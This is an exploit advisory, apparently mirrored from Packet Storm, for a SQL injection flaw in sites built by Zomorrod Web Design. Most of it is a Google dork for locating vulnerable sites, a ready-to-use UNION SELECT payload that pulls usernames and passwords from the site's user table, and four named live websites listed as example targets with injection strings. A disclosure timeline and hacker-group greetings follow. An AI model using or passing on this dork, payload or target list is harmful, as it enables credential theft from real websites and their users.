Sites designed by Zomorrod Web Design suffer from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
efbf318f4c7cb5cfedb51d243ed1d7fb0cbbe9a86253985411d3408497f25171#####################################################
zomorrod Web Design Sql Injection Vulnerability
#####################################################
# Exploit Title : zomorrod Web Design Sql Injection Vulnerability
# Google Dork: inurl: Design By Zomorrod 0r inurl:topic.php?SITE_item=
#vender : http://www.zomorrod.net/
# Expl0it : topic.php?SITE_item=-54+union+select+1,group_concat(username,0x3a,passw ord),3,4,5,6,7+from+zusers--
#Author: BHG Security Center
# Home: http://cc.black-hg.org/ - http://greyh4t.com/cc/
# Tested on: [linux+apache]
# Finder(s):Siavash (morghabi_s@yahoo.com)
# Examle:
http://www.shamekh.ir/fa/topic.php?SITE_item=%27116
http://www.tnfcranes.ir/topic.php?SITE_item=%2756
http://www.accportal.com/topic.php?SITE_item=%271945
http://www.karaj-archery.com/topic.php?SITE_item=%27593
##################################################
[-] Disclosure timeline:
[04/08/2011] - Vulnerabilities discovered
[14/10/2011] - Others vulnerabilities discovered
[15/10/2011] - Issues reported to http://black-hg.org/
[04/09/2012] - Public disclosure
# Greets To :
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ G3n3Rall ~ l4tr0d3ctism ~ NoL1m1t
~ Mr.XHat ~ Dj.TiniVini ~ Siamak.Black ~ 0x0ptim0us THANKS TO ALL Iranian HackerZ ./Persian Gulf
===========================================[End]=============================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed